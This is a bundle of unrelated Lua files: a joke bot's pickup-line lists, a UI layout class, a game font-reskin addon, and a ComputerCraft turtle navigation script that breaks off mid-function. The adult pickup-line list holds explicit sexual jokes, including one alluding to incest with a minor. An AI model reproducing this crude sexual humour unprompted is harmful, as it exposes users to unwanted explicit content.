nsfw = false,
joke = true,
usePrefix = true,
whitelistSlashCommand = true
}
JokerData.Config.PickupLinesXXX = {
command = "pickup-xxx",
label = "Pickup Lines (Adult)",
nsfw = true,
joke = true,
usePrefix = true,
whitelistSlashCommand = true
}
JokerData.Config.PickupLinesHP = {
command = "pickup-hp",
label = "Pickup Lines (Harry Potter)",
joke = true,
nsfw = false,
usePrefix = true,
whitelistSlashCommand = true
}
-- Cheesy and cute (mostly clean) lines
JokerData.PickupLines = {
"Can I have your picture so I can show Santa what I want for Christmas?",
"Are you a magician? Because whenever I look at you, everyone else disappears!",
"Was your dad a boxer? Because damn, you’re a knockout!",
"Is there an airport nearby or is it my heart taking off?",
"Are you French because Eiffel for you.",
"Is that a mirror in your pocket? Cause I can see myself in your pants!",
"Are you religious? Cause you’re the answer to all my prayers.",
"Hey, tie your shoes! I don’t want you falling for anyone else.",
"You must be Jamaican, because Jamaican me crazy.",
"What has 36 teeth and holds back the Incredible Hulk? My zipper.",
"Somebody call the cops, because it’s got to be illegal to look that good!",
"I must be a snowflake, because I've fallen for you.",
"I know you're busy today, but can you add me to your to-do list?",
"If you were a steak you would be well done.",
"Hello, I'm a thief, and I'm here to steal your heart.",
"Are you cake? Cause I want a piece of that.",
"My love for you is like diarrhoea, I just can't hold it in.",
"Are you lost ma'am? Because heaven is a long way from here.",
"There is something wrong with my cell phone. It doesn't have your number in it.",
"If you were a library book, I would check you out.",
"Are you a cat because I'm feline a connection between us",
"If I were to ask you out on a date, would your answer be the same as the answer to this question?",
"If nothing lasts forever, will you be my nothing?",
"I'm new in town. Could you give me directions to your apartment?",
"I must be in a museum, because you truly are a work of art.",
"You spend so much time in my mind, I should charge you rent.",
"My lips are like skittles. Wanna taste the rainbow?",
"Well, here I am. What were your other two wishes?",
"Are you from Tennessee? Because you're the only 10 I see!",
"Are you a beaver? Cause daaaaaaaaam!",
"Life without you is like a broken pencil... pointless.",
"Do you want to see a picture of a beautiful person? (hold up a mirror)",
"Is your body from McDonald's? Cause I'm lovin' it!",
"cheesy gravity pick up line",
"Even if there wasn't gravity on earth, I'd still fall for you.",
"Roses are red, violets are blue, how would you like it if I came home with you?",
"I wish I were cross-eyed so I can see you twice",
"We're not socks. But I think we'd make a great pair.",
"Your lips look so lonely…Would they like to meet mine?",
"Are you a parking ticket? ‘Cause you’ve got fine written all over you.",
"Thank god I'm wearing gloves because you are too hot to handle.",
"If a fat man puts you in a bag at night, don't worry I told Santa I wanted you for Christmas.",
"I'm no photographer, but I can picture us together.",
"Do your legs hurt from running through my dreams all night?",
"Pinch me, you’re so fine I must be dreaming.",
"If you were a chicken, you'd be impeccable.",
"How much does a polar beat weight? Enough to break the ice!",
"Are you a 90 degree angle? Cause you are looking right!",
"Nice to meet you, I’m (your name) and you are... gorgeous!",
"If I were a transplant surgeon, I’d give you my heart.",
"Are you Israeli? Cause you Israeli hot.",
"On a scale from 1 to 10, you're a 9... And I'm the 1 you need.",
"Did it hurt? When you fell out of heaven?",
"If I could rearrange the alphabet I would put U and I together.",
"Remember me? Oh, that’s right, I’ve met you only in my dreams.",
"Is your name Google? Because you've got everything I'm searching for.",
"Your hand looks heavy. Here, let me hold it for you.",
"I’ve been wondering, do your lips taste as good as they look.",
"Are you from Starbucks because I like you a latte.",
"Are you a banana because I find you a peeling.",
"Do you like vegetables because I love you from my head tomatoes.",
"Have you been to the doctor's lately? Cause I think you're lacking some vitamin me.",
"Do you generate electricity with water through the process of hydro power? Because dammmm.",
"Do you like science because I've got my ion you.",
"Are you my appendix? Because I don't understand how you work but this feeling in my stomach makes me want to take you out.",
"Funny pick up line about free clothing",
"Do you like sales? Because if you're looking for a good one, clothing is 100% off at my place.",
"I know this is going to sound cheesy, but I think you're the gratest.",
"If you were a triangle you'd be acute one.",
"Does your left eye hurt? Because you’ve been looking right all day.",
"My feet are getting cold… because you’ve knocked my socks off.",
"Wow, when god made you he was showing off.",
"If beauty were time, you’d be eternity.",
"Is your name Wi-fi? Because I'm really feeling a connection.",
"If looks could kill, you'd be a weapon of mass destruction.",
"Do you have a tan, or do you always look this hot?",
"Can I follow you home? Cause my parents always told me to follow my dreams.",
"If I were a cat I'd spend all 9 lives with you.",
"Are you a camera? Because every time I look at you, I smile.",
"Are you from Japan cause I'm trying to get in Japanties.",
"If you were a fruit you'd be a fineapple.",
"I'll give you a kiss. If you don't like it, you can return it.",
"Did you swallow magnets? Cause you're attractive.",
"Are you from China? Because I'm China get your number.",
"Do you have a name, or can I call you mine?",
"Are you craving Pizza? Because I’d love to get a pizz-a you",
"Wouldn't we look cute on a wedding cake together.",
"Would you grab my arm so I can tell my friends I've been touched by an angel?",
"Kiss me if I'm wrong, but dinosaurs still exist, right?",
"Is your dad a terrorist? Because you are the bomb.",
"You must be a ninja, because you snuck into my heart",
"Can you pinch me, because you're so fine I must be dreaming.",
"I may not be a genie, but I can make all your wishes come true!",
"Are you Australian? Because you meet all of my koala-fications.",
"I’m not drunk, I’m just intoxicated by you.",
"If I followed you home, would you keep me?",
"If you were words on a page, you’d be fine print.",
"Are you a keyboard ? Because you are my type.",
"There is something wrong with my phone. Could you call it for me to see if it rings?",
"I've seem to have lost my number, can I have yours?",
"cute and funny pick up line about flowers",
"If I had a garden I’d put your tulips and my tulips together",
"Did you hear of the new disease called beautiful, I think you're infected.",
"I thought Happiness starts with H. But why does mine starts with U.",
"If you were a vegetable you'd be a cutecumber.",
"You know what you would really look beautiful in? My arms.",
"My mom thinks I'm gay, can you help me prove her wrong?",
"I want someone to look at me the way I look at chocolate cake.",
"Is it hot in here or is it just you?",
"Are you going to kiss me or do I have to lie to my diary?",
"Feel my t-shirt, it’s made of boyfriend material.",
"You must be a magician, because every time I look at you, everyone else disappears.",
"Your name must be Coca Cola, because you're so-da-licious.",
"You're like a dictionary... you add meaning to my life.",
"My doctor says I'm lacking vitamin U.",
"Did your licence get suspended for driving all these guys crazy?",
"funny love up line about love",
"Do you believe in love at first sight or should I walk past again?",
"When a penguin finds a mate they stay with them for the rest of their life. Will you be my penguin?",
"Can I take a picture of you so santa knows what I want for christmas?",
"I'm new in town, could you give me directions to your apartment?",
"I'll cook you dinner, if you cook me breakfast",
"What does it feel like to be the most beautiful girl in the room?",
"Good thing I just bought term life insurance … because I saw you and my heart stopped!",
"If I had a dollar for every time I thought of you, I’d be in a higher tax bracket.",
"Hey, my name’s Microsoft. Can I crash at your place tonight?",
"Was that an earthquake or did you just rock my world?",
"You’re so sweet, you’re giving me a toothache.",
"Roses are red, bananas are yellow, wanna go out with a nice little fellow?",
"If you're here, who's running heaven?",
"Do you have a name? Or can I call you mine?",
"Let's commit the perfect crime. I'll steal your heart and you can steal mine.",
"Where do you hide your halo?",
"You look familiar - did we have class together? I could have sworn we had chemistry.",
"You're like a dictionary. You add meaning to my life.",
"If you hold 8 roses in front of a mirror, you'll see 9 of the most beautiful things in the world.",
"Is your body from McDonald's? Because I'm lovin' it.",
"Your eyes are bluer than the Atlantic ocean and baby, I'm all lost at sea.",
"You are so beautiful that you give the sun a reason to shine.",
"Do you have a map? Because I just keep getting lost in your eyes.",
"I wish I was one of your tears, so I could be born in your eyes, run down your cheek, and die on your lips.",
"It's not my fault I fell in love. You are the one that tripped me.",
"If you were a booger, I'd pick you first!",
"I must be Richard Gere, because you are a Pretty Woman!"
}
-- XXX: Adult/R-Rated
-- User is warned prior to first use
JokerData.PickupLinesXXX = {
"Are you a button? Cause I'd tap that!",
"Ay gurl is yo dad in jail? Cuz if i was your dad, i’d be in jail.",
"Are you a drill sergeant? Because you have my privates standing at attention.",
"Your breasts remind me of Mount Rushmore – my face should be among them.",
"Let’s play carpenter. First we’ll get hammered, then I’ll nail you.",
"I can tell you’re into yoga, why don’t you spend a little time showing me just how flexible you are?",
"Was your dad a baker? Because you’ve got a nice set of buns.",
"I lost my keys… Can I check your pants?",
"If I said you had a beautiful body, would you hold it against me?",
"Do you know why they call me the cat whisperer? Because I know exactly what your pussy needs.",
"I’ll be Burger King and you be McDonald’s. I’ll have it my way and you’ll be lovin’ it.",
"You’re like my pinky toe, I’m gonna bang you on every piece of furniture in my home.",
"Let’s go to my place and do some math. Add a bed, subtract our clothes, divide your legs, and multiply.",
"I was feeling off today, but you definitely turned me on.",
"I like my coffee how I like my partner... creamed.",
"Treat me like a pirate and give me that booty.",
"Want to save water by showering together?",
"Are you related to Dracula? Because you looked a little thirsty when you were looking at me.",
"So you’re not into casual sex? Fine, I’ll put on a tux and we can call it formal sex.",
"Liquor is not the only hard thing around here.",
"We should play strip poker. You can strip and I’ll poke you.",
"I’m scared of getting pregnant, so do you want to go up to my room and help me test all my condoms?",
"If you were an elevator, what button would I have to push to get you to go down?",
"Are you butt dialing? Because I swear that ass is calling me.",
"I’m no weather man, but you can expect more than a few inches tonight.",
"Do you have pet insurance? Because your pussy’s getting smashed tonight.",
"What’s the difference between a Ferrari and an erection? I don’t have a Ferrari.",
"There are plenty of fish in the sea, but you’re the only one I’d like to catch and mount back at my place.",
"That dress looks great on you… as a matter of fact, so would I.",
"The only reason I would kick you out of bed would be to fuck you on the floor.",
"Pizza is my second favorite thing to eat in bed.",
"Why pay for a bra when I would gladly hold your boobs up all day for free?",
"As long as I have a face, you’ll have a place to sit.",
"Would you like to try an Australian kiss? It is just like a French kiss, but down under.",
"Do you work for UPS? I could have sworn I saw you checking out my package.",
"What is a nice girl like you doing in a dirty mind like mine?",
"You can call me cake, because I’ll go straight to your ass.",
"Are you a racehorse? Because when I ride you’ll always finish first.",
"Fuck me if I’m wrong, but dinosaurs still exist right?",
"I lost my virginity. Can I have yours?",
"If I’m a pain in your ass… We can just add more lubricant.",
"Are you my new boss? Because you just gave me a raise.",
"Someone vacuum my lap, I think this girl needs a clean place to sit.",
"I’m a bird watcher and I’m looking for a Big Breasted Bed Thrasher. Have you seen one?",
"If it’s true that we are what we eat, then I could be you by morning.",
"The last woman I was with said, 'Kiss me where it stinks.' So, I drove her to New Jersey.",
"What's better than roses on a piano? Tulips on an organ.",
"Wanna go back to my place and watch porn on my flat screen mirror?",
"Screw me if I am wrong, but haven't we met before?",
"What kind of Uber are you - long or short rides?",
"My bed's broken, can I sleep in yours?",
"If I told you I work for UPS, would you let me handle your package?",
"Tell me your name so I know what to scream tonight.",
"You look like a hard worker. I have an opening you can fill.",
"Let's do breakfast tomorrow. Should I call you or nudge you?",
"Did you just ring my doorbell? Well, you can come inside if you want to.",
"I'm easy, but it looks like you're hard.",
"That shirt is very becoming on you. Then again, I would be too!",
"In my mind, we're going to have sex anyway, so you might as well be in the room.",
"I don't feel so good, I think I need a shot of penis-illin.",
"Do these look real? Wanna check?",
"Sex is a killer. Do you wanna die happy?",
"Let's play hockey. I'll be the net, and you can score.",
"Do you know how to use a whip?",
"Are you going to sleep with me or do I have to lie to my diary?",
"If you were in bed with me, I wouldn't need the cover to keep warm.",
"Don't stick out your tongue unless you intend to use it.",
"Hey baby, want to play fireman? We can stop, drop, and roll.",
"Wanna play Army? You be the enemy and I'll blow you away.",
"I don't know what you think of me, but I hope it's X-rated.",
"I love every bone in my body... Especially yours."
}
-- HP: Harry Potter themed
JokerData.PickupLinesHP = {
"My name may not be Luna, but I sure know how to Lovegood.",
"I can be your house elf. I'll do whatever you want and I don't need any clothes.",
"My name may not be Luna, but I sure know how to Lovegood.",
"Your smile is like Expelliarmus. Simple, but disarming.",
"I need to learn Occlumency, because I can't get you out of my thoughts.",
"If I were going to produce a Patronus, you'd be my happy thought.",
"Girl, are you sure you're a muggle 'cause I'd swear that ass is magical.",
"If you were a Dementor, I'd turn criminal just to get your kiss.",
"Being without you is like being under the Cruciatus Curse.",
"Are you a Snitch? Because you're by far the greatest catch here.",
"I may not be Mad-Eye Moody, but I do have a mad eye for you.",
"Are you using the Confundus charm or are you just naturally mind-blowing?",
"Even if I lived in a cupboard under the stairs, I'd still make room for you.",
"My love for you burns like a dying phoenix.",
"You and me together? Granger things have happened!",
"Are you a Dementor? Because you just took my breath away.",
"Call Ollivander, because I think my wand has found its master.",
"We may not be in Professor Flitwick's class, but you're still charming!",
"Did you just cast Petrificus Totalus? You've made me stiff.",
"If you were a Quaffle and I was a Chaser during a Quidditch match, I'd score with you.",
"I'd like to get my basilisk into your Chamber of Secrets.",
"The Sorting Hat placed me in Gryffindor. I think it's because like Godric Gryffindor himself, I too have an impressive sword.",
"Are you interested in making some magic together? My wand is at the ready.",
"The Sorting Hat saw my destiny, and it said I'm meant to be in your House.",
"I don't need to cast Accio to make you come.",
"Would you like a butterbeer? It's a Portkey. Next thing you know we'll be back at my place.",
"I'm just like Oliver Wood, baby... I'm a keeper!",
"I've been whomping my willow thinking about you.",
"Speak Parseltongue to me and I’ll let my snake out.",
"One night with me and they'll be calling you Moaning Myrtle.",
"I don't have any muggle money, but I do have a sickle and two knuts.",
"I might as well be under the Imperius curse, because I'd do anything for you.",
"You know, when I said, 'Accio hottie', I didn't expect it to work!",
"Did you put Skele-Gro in my drink? Because I can feel a bone growing!",
"Hagrid's not the only giant on campus, if you know what I mean.",
"I'd let you Slytherin to my bed anytime you want.",
"You're the only thing I need in my Room of Requirement.",
"You don't have to say Lumos to turn me on.",
"I must have had some Felix Felicis, because I think I'm about to get lucky.",
"Are you aware of Platform 9 and 3/4? Well, I know something else with the same definite estimations.",
"Did you survive Avada Kedavra? Cause your drop dead gorgeous!",
"Roses are red Violets are blue I thought Voldemort was ugly, But then I saw you. "
}
|
--- A container that holds and maintains a dynamically arranged collection of @{Frame}s.
-- @classmod Box
local Base = require("vyzor.base")
local BoxMode = require("vyzor.enum.box_mode")
local Lib = require("vyzor.lib")
local Box = Base("Compound", "Box")
--- Box constructor.
-- @function Box
-- @string _name The name of the Box and the automatically generated container @{Frame}.
-- @tparam[opt=BoxMode.Horizontal] BoxMode initialMode Alignment of @{Frame}s.
-- @tparam Frame initialBackground The background @{Frame} for this Box.
-- @tparam table initialFrames A numerically indexed table holding the @{Frame}s this Box contains.
-- @treturn Box
local function new (_, _name, initialMode, initialBackground, initialFrames)
assert(_name, "Vyzor: New Box must be supplied with a name")
--- @type Box
local self = {}
local _mode = initialMode or BoxMode.Horizontal
local _frames = Lib.OrderedTable()
if initialFrames and type(initialFrames) == "table" then
for _, frame in ipairs(initialFrames) do
_frames[frame.Name] = frame
end
end
local _backgroundFrame = initialBackground
if _frames:count() > 0 then
for frame in _frames:each() do
_backgroundFrame:Add(frame)
end
end
local function updateFrames()
if _mode == BoxMode.Horizontal then
for index, frame in _frames:ipairs() do
frame.Position.X = (1 / _frames:count()) * (index - 1)
frame.Position.Y = 0
frame.Size.Width = (1 / _frames:count())
frame.Size.Height = 1
end
elseif _mode == BoxMode.Vertical then
for index, frame in _frames:ipairs() do
frame.Position.X = 0
frame.Position.Y = (1 / _frames:count()) * (index - 1)
frame.Size.Width = 1
frame.Size.Height = (1 / _frames:count())
end
elseif _mode == BoxMode.Grid then
local rows = math.floor(math.sqrt(_frames:count()))
local columns = math.ceil(_frames:count() / rows)
local currentRow = 1
local currentColumn = 1
for frame in _frames:each() do
if currentColumn > rows then
currentColumn = 1
currentRow = currentRow + 1
end
frame.Position.X = (1 / rows) * (currentColumn - 1)
frame.Position.Y = (1 / columns) * (currentRow - 1)
frame.Size.Width = (1 / rows)
frame.Size.Height = (1 / columns)
currentColumn = currentColumn + 1
end
end
end
--- Properties
--- @section
local properties = {
Name = {
--- Returns the name of the Box.
-- @function self.Name.get
-- @treturn string
get = function ()
return _name
end,
},
Background = {
--- Returns the background @{Frame} of the Box.
-- @function self.Background.get
-- @treturn Frame
get = function ()
return _backgroundFrame
end,
},
Frames = {
--- Returns the @{Frame}s the Box contains.
-- @function self.Frames.get
-- @treturn table
get = function ()
if _frames:count() > 0 then
local copy = {}
for k, v in _frames:pairs() do
copy[k] = v
end
return copy
else
return {}
end
end,
},
Container = {
--- Returns the parent @{Frame} of the Box.
-- @function self.Container.get
-- @treturn Frame
get = function ()
return _backgroundFrame.Container
end,
--- Sets the parent @{Frame} of the Box.
-- @function self.Container.set
-- @tparam Frame value
set = function (value)
_backgroundFrame.Container = value
end
},
Mode = {
--- Returns the @{BoxMode} of the Box.
-- @function self.Mode.get
-- @treturn BoxMode
get = function ()
return _mode
end,
--- Sets the @{BoxMode} of the Box.
-- @function self.Mode.set
-- @tparam BoxMode value
set = function (value)
if BoxMode:IsValid(value) then
_mode = value
updateFrames()
else
error(string.format("Vyzor: Invalid BoxMode Enum passed to %s", _name), 3)
end
end
},
}
--- @section end
updateFrames()
setmetatable(self, {
__index = function (_, key)
return (properties[key] and properties[key].get()) or Box[key]
end,
__newindex = function (_, key, value)
if properties[key] and properties[key].set then
properties[key].set(value)
end
end,
})
return self
end
setmetatable(Box, {
__index = getmetatable(Box).__index,
__call = new,
})
return Box
|
local F, C = unpack(select(2, ...))
if not C.appearance.fonts then return end
local normalFont = C.font.normal
local headerFont = C.font.header
local chatFont = C.font.chat
local dmgFont = C.font.damage
_G.STANDARD_TEXT_FONT = normalFont
_G.UNIT_NAME_FONT = headerFont
_G.DAMAGE_TEXT_FONT = dmgFont
local function ReskinFont(fontObj, fontPath, fontSize, fontFlag, fontColor, fontShadow)
fontObj:SetFont(fontPath, fontSize, fontFlag and 'OUTLINE' or '')
if fontColor then
fontObj:SetTextColor(fontColor.r, fontColor.g, fontColor.b)
end
if fontShadow then
fontObj:SetShadowColor(0, 0, 0, 1)
fontObj:SetShadowOffset(1, -1)
end
end
ReskinFont(AchievementFont_Small, normalFont, 12)
ReskinFont(CoreAbilityFont, headerFont, 32)
ReskinFont(DestinyFontMed, normalFont, 14)
ReskinFont(DestinyFontHuge, headerFont, 32)
ReskinFont(DestinyFontLarge, normalFont, 18)
ReskinFont(FriendsFont_Normal, normalFont, 12)
ReskinFont(FriendsFont_Small, normalFont, 12)
ReskinFont(FriendsFont_Large, normalFont, 14)
ReskinFont(FriendsFont_UserText, normalFont, 12)
ReskinFont(GameFont_Gigantic, headerFont, 38)
ReskinFont(InvoiceFont_Small, normalFont, 10)
ReskinFont(InvoiceFont_Med, normalFont, 12)
ReskinFont(MailFont_Large, normalFont, 14)
ReskinFont(NumberFont_Small, chatFont, 11)
ReskinFont(NumberFont_GameNormal, chatFont, 12)
ReskinFont(NumberFont_Normal_Med, chatFont, 12)
ReskinFont(NumberFont_Shadow_Tiny, chatFont, 10)
ReskinFont(NumberFont_OutlineThick_Mono_Small, chatFont, 12, true)
ReskinFont(NumberFont_Outline_Med, chatFont, 12, true)
ReskinFont(NumberFont_Outline_Large, chatFont, 14, true)
ReskinFont(NumberFont_Shadow_Med, chatFont, 14, true)
ReskinFont(NumberFont_Shadow_Small, chatFont, 12)
ReskinFont(QuestFont_Shadow_Small, normalFont, 12)
ReskinFont(QuestFont_Large, normalFont, 14)
ReskinFont(QuestFont_Shadow_Huge, headerFont, 20)
ReskinFont(QuestFont_Huge, headerFont, 20)
ReskinFont(QuestFont_Super_Huge, headerFont, 22)
ReskinFont(QuestFont_Enormous, headerFont, 30)
ReskinFont(ReputationDetailFont, normalFont, 12)
ReskinFont(SpellFont_Small, normalFont, 12)
ReskinFont(SystemFont_InverseShadow_Small, normalFont, 10)
ReskinFont(SystemFont_Large, normalFont, 14)
ReskinFont(SystemFont_Huge1, normalFont, 20)
ReskinFont(SystemFont_Huge2, headerFont, 24)
ReskinFont(SystemFont_Med1, normalFont, 12)
ReskinFont(SystemFont_Med2, normalFont, 14)
ReskinFont(SystemFont_Med3, normalFont, 13)
ReskinFont(SystemFont_OutlineThick_WTF, headerFont, 32, true)
ReskinFont(SystemFont_OutlineThick_Huge2, headerFont, 22, true)
ReskinFont(SystemFont_OutlineThick_Huge4, headerFont, 26, true)
ReskinFont(SystemFont_Outline_Small, normalFont, 12, true)
ReskinFont(SystemFont_Outline, normalFont, 15, true)
ReskinFont(SystemFont_Shadow_Large, normalFont, 16)
ReskinFont(SystemFont_Shadow_Large_Outline, normalFont, 16, true)
ReskinFont(SystemFont_Shadow_Large2, normalFont, 18)
ReskinFont(SystemFont_Shadow_Med1, normalFont, 12)
ReskinFont(SystemFont_Shadow_Med1_Outline, normalFont, 12, true)
ReskinFont(SystemFont_Shadow_Med2, normalFont, 16)
ReskinFont(SystemFont_Shadow_Med3, normalFont, 14)
ReskinFont(SystemFont_Shadow_Outline_Huge2, normalFont, 22, true)
ReskinFont(SystemFont_Shadow_Huge1, normalFont, 20)
ReskinFont(SystemFont_Shadow_Huge2, normalFont, 24)
ReskinFont(SystemFont_Shadow_Huge3, normalFont, 25)
ReskinFont(SystemFont_Shadow_Small, normalFont, 12)
ReskinFont(SystemFont_Shadow_Small2, normalFont, 12)
ReskinFont(SystemFont_Small, normalFont, 12)
ReskinFont(SystemFont_Small2, normalFont, 13)
ReskinFont(SystemFont_Tiny, normalFont, 9)
ReskinFont(SystemFont_Tiny2, normalFont, 8)
ReskinFont(SystemFont_NamePlate, normalFont, 12)
ReskinFont(SystemFont_LargeNamePlate, normalFont, 12)
ReskinFont(SystemFont_NamePlateFixed, normalFont, 12)
ReskinFont(SystemFont_LargeNamePlateFixed, normalFont, 12)
ReskinFont(SystemFont_World, headerFont, 64)
ReskinFont(SystemFont_World_ThickOutline, headerFont, 64, true)
ReskinFont(SystemFont_WTF2, headerFont, 64)
ReskinFont(HelpFrameKnowledgebaseNavBarHomeButtonText, normalFont, 14)
ReskinFont(Game11Font, normalFont, 11)
ReskinFont(Game12Font, normalFont, 12)
ReskinFont(Game13Font, normalFont, 13)
ReskinFont(Game13FontShadow, normalFont, 13)
ReskinFont(Game15Font, normalFont, 15)
ReskinFont(Game16Font, normalFont, 16)
ReskinFont(Game18Font, normalFont, 18)
ReskinFont(Game20Font, normalFont, 20)
ReskinFont(Game24Font, normalFont, 24)
ReskinFont(Game27Font, normalFont, 27)
ReskinFont(Game30Font, normalFont, 30)
ReskinFont(Game32Font, normalFont, 32)
ReskinFont(Game36Font, normalFont, 36)
ReskinFont(Game42Font, normalFont, 42)
ReskinFont(Game46Font, normalFont, 46)
ReskinFont(Game48Font, normalFont, 48)
ReskinFont(Game48FontShadow, normalFont, 48)
ReskinFont(Game60Font, normalFont, 60)
ReskinFont(Game72Font, normalFont, 72)
ReskinFont(Game120Font, normalFont, 120)
ReskinFont(System_IME, normalFont, 16)
ReskinFont(Fancy12Font, normalFont, 12)
ReskinFont(Fancy14Font, normalFont, 14)
ReskinFont(Fancy16Font, normalFont, 16)
ReskinFont(Fancy18Font, normalFont, 18)
ReskinFont(Fancy20Font, normalFont, 20)
ReskinFont(Fancy22Font, normalFont, 22)
ReskinFont(Fancy24Font, normalFont, 24)
ReskinFont(Fancy27Font, normalFont, 27)
ReskinFont(Fancy30Font, normalFont, 30)
ReskinFont(Fancy32Font, normalFont, 32)
ReskinFont(Fancy48Font, normalFont, 48)
ReskinFont(SplashHeaderFont, normalFont, 24)
ReskinFont(ChatBubbleFont, normalFont, 16)
ReskinFont(GameFontNormalHuge2, normalFont, 24)
ReskinFont(SplashHeaderFont, normalFont, 24)
ReskinFont(GameTooltipHeader, normalFont, 14)
ReskinFont(Tooltip_Med, normalFont, 12)
ReskinFont(Tooltip_Small, normalFont, 12)
ReskinFont(ZoneTextFont, headerFont, 40)
ReskinFont(SubZoneTextFont, headerFont, 40)
ReskinFont(WorldMapTextFont, headerFont, 40)
ReskinFont(ErrorFont, normalFont, 14)
ReskinFont(GameFontNormalHuge, normalFont, 14)
ReskinFont(RaidWarningFrame.slot1, normalFont, 20)
ReskinFont(RaidWarningFrame.slot2, normalFont, 20)
ReskinFont(RaidBossEmoteFrame.slot1, normalFont, 20)
ReskinFont(RaidBossEmoteFrame.slot2, normalFont, 20)
-- WhoFrame LevelText
hooksecurefunc('WhoList_Update', function()
for i = 1, WHOS_TO_DISPLAY, 1 do
local level = _G['WhoFrameButton'..i..'Level']
if level and not level.fontStyled then
level:SetWidth(32)
level:SetJustifyH('LEFT')
level.fontStyled = true
end
end
end)
-- Text color
GameFontBlackMedium:SetTextColor(1, 1, 1)
CoreAbilityFont:SetTextColor(1, 1, 1)
--[[local ColorizeFonts = {
'GameFontNormal',
'GameFontNormal_NoShadow',
'GameFontNormalHuge',
'GameFontNormalSmall',
'GameFontNormalTiny',
'GameFontNormalTiny2',
'GameFontNormalMed1',
'GameFontNormalMed2',
'GameFontNormalLarge',
'GameFontNormalLargeOutline',
'GameFontNormalHugeOutline2',
'GameFontNormalOutline',
'GameFontNormalMed3',
'GameFontNormalSmall2',
'GameFontNormalLarge2',
'GameFontNormalWTF2',
'GameFontNormalWTF2Outline',
'GameFontNormalHuge2',
'GameFontNormalShadowHuge2',
'GameFontNormalHugeOutline',
'GameFontNormalHuge3',
'GameFontNormalHuge3Outline',
'GameFontNormalHuge4',
'GameFontNormalHuge4Outline',
'IMEHighlight',
'BossEmoteNormalHuge',
'NumberFontNormalRightYellow',
'NumberFontNormalYellow',
'NumberFontNormalLargeRightYellow',
'NumberFontNormalLargeYellow',
'DialogButtonNormalText',
'GameNormalNumberFont',
'CombatTextFont',
'CombatTextFontOutline',
'AchievementPointsFont',
'AchievementPointsFontSmall',
'AchievementDateFont',
'FocusFontSmall',
'ArtifactAppearanceSetNormalFont',
'Fancy22Font',
'QuestFont_Super_Huge',
'QuestFont_Super_Huge_Outline',
'SplashHeaderFont',
'QuestFont_Enormous',
'GameFont_Gigantic',
}
for _, font in next, ColorizeFonts do
_G[font]:SetTextColor(233/255, 197/255, 93/255)
end
NORMAL_FONT_COLOR = CreateColor(233/255, 197/255, 93/255)
NORMAL_FONT_COLOR_CODE = '|cffe9c55d'--]] |
slots = 16
function string:split(delimiter)
local result = { }
local from = 1
local delim_from, delim_to = string.find( self, delimiter, from )
while delim_from do
table.insert( result, string.sub( self, from , delim_from-1 ) )
from = delim_to + 1
delim_from, delim_to = string.find( self, delimiter, from )
end
table.insert( result, string.sub( self, from ) )
return result
end
function dig_and_move_forward(steps)
for i = 1, steps do
while turtle.detect() == true do
local success, item = turtle.inspect()
if success then
if item.name == "computercraft:turtle_expanded"
then os.sleep(2)
else turtle.dig()
end
end
end
turtle.forward()
end
end
function dig_and_move_down(steps)
for i = 1, steps do
while turtle.detectDown() == true do
local success, item = turtle.inspectDown()
if success then
if item.name == "computercraft:turtle_expanded"
then os.sleep(2)
else turtle.digDown()
end
end
end
turtle.down()
end
end
function dig_and_move_up(steps)
for i = 1, steps do
while turtle.detectUp() == true do
local success, item = turtle.inspectUp()
if success then
if item.name == "computercraft:turtle_expanded"
then os.sleep(2)
else turtle.digUp()
end
end
end
turtle.up()
end
end
function calculate_steps(target_x,target_y,target_z)
local current_x,current_y,current_z = gps.locate()
local x_steps = current_x - target_x
local y_steps = current_y - target_y
local z_steps = current_z - target_z
return x_steps,y_steps,z_steps
end
function calculate_orientation()
local prev_x,prev_y,prev_z = gps.locate()
dig_and_move_forward(1)
local current_x, current_y,current_z = gps.locate()
if prev_x == current_x + 1 then return 1
elseif prev_z == current_z + 1 then return 2
elseif prev_x == current_x - 1 then return 3
elseif prev_z == current_z - 1 then return 4
end
end
function set_x_orientation_positive(current_orientation)
if current_orientation == 1 then
return 1
elseif current_orientation == 2 then
turtle.turnLeft()
return 1
elseif current_orientation == 3 then
turtle.turnLeft()
turtle.turnLeft()
return 1
elseif current_orientation == 4 then
turtle.turnRight()
return 1
end
end
function set_x_orientation_negative(current_orientation)
if current_orientation == 1 then
turtle.turnRight()
turtle.turnRight()
return 3
elseif current_orientation == 2 then
turtle.turnRight()
return 3
elseif current_orientation == 3 then
return 3
elseif current_orientation == 4 then
turtle.turnLeft()
return 3
end
end
function set_z_orientation_positive(current_orientation)
if current_orientation == 1 then
turtle.turnRight()
return 2
elseif current_orientation == 2 then
return 2
elseif current_orientation == 3 then
turtle.turnLeft()
return 2
elseif current_orientation == 4 then
turtle.turnLeft()
turtle.turnLeft()
return 2
end
end
function set_z_orientation_negative(current_orientation)
if current_orientation == 1 then
turtle.turnLeft()
return 4
elseif current_orientation == 2 then
turtle.turnLeft()
turtle.turnLeft()
return 4
elseif current_orientation == 3 then
turtle.turnRight()
return 4
elseif current_orientation == 4 then
return 4
end
end
function navigation_to_target(x_steps, y_steps, z_steps,current_orientation)
if x_steps >= 0 then
set_x_orientation_positive(current_orientation)
current_orientation = 1
dig_and_move_forward(math.abs(x_steps))
elseif x_steps < 0 then
set_x_orientation_negative(current_orientation)
current_orientation = 3
dig_and_move_forward(math.abs(x_steps))
end
if z_steps >= 0 then
set_z_orientation_positive(current_orientation)
current_orientation = 2
dig_and_move_forward(math.abs(z_steps))
elseif z_steps < 0 then
set_z_orientation_negative(current_orientation)
current_orientation = 4
dig_and_move_forward(math.abs(z_steps))
end
if y_steps >= 0 then
dig_and_move_down(math.abs(y_steps))
elseif y_steps < 0 then
dig_and_move_up(math.abs(y_steps))
end
return current_orientation
end
function powerline_movement(current_x, current_y, current_z)
request_powerline_job = "http://127.0.0.1:5000/powerline_path"
http_request = http.get(request_powerline_job)
powerline_job_inputs = http_request.readAll()
target_table = powerline_job_inputs:split(",")
x = tonumber(target_table[1])
z = tonumber(target_table[2])
y = 98 -- Default Height for all powerline movement operations.
x_steps, y_steps, z_steps = calculate_steps(x,y,z)
return x_steps, y_steps, z_steps, x , z
end
function powerline_operations()
powerline_job_check = "http://127.0.0.1:5000/powerline_jobs_available"
http_request = http.get(powerline_job_check)
powerline_job_check = http_request.readAll()
while powerline_job_check == "0" do
os.sleep(5)
powerline_job_check = "http://127.0.0.1:5000/powerline_jobs_available"
http_request = http.get(powerline_job_check)
powerline_job_check = http_request.readAll()
print("no jobs available")
end
turtle.suckDown(1)
origin_x , origin_y , origin_z = gps.locate()
current_orientation = calculate_orientation()
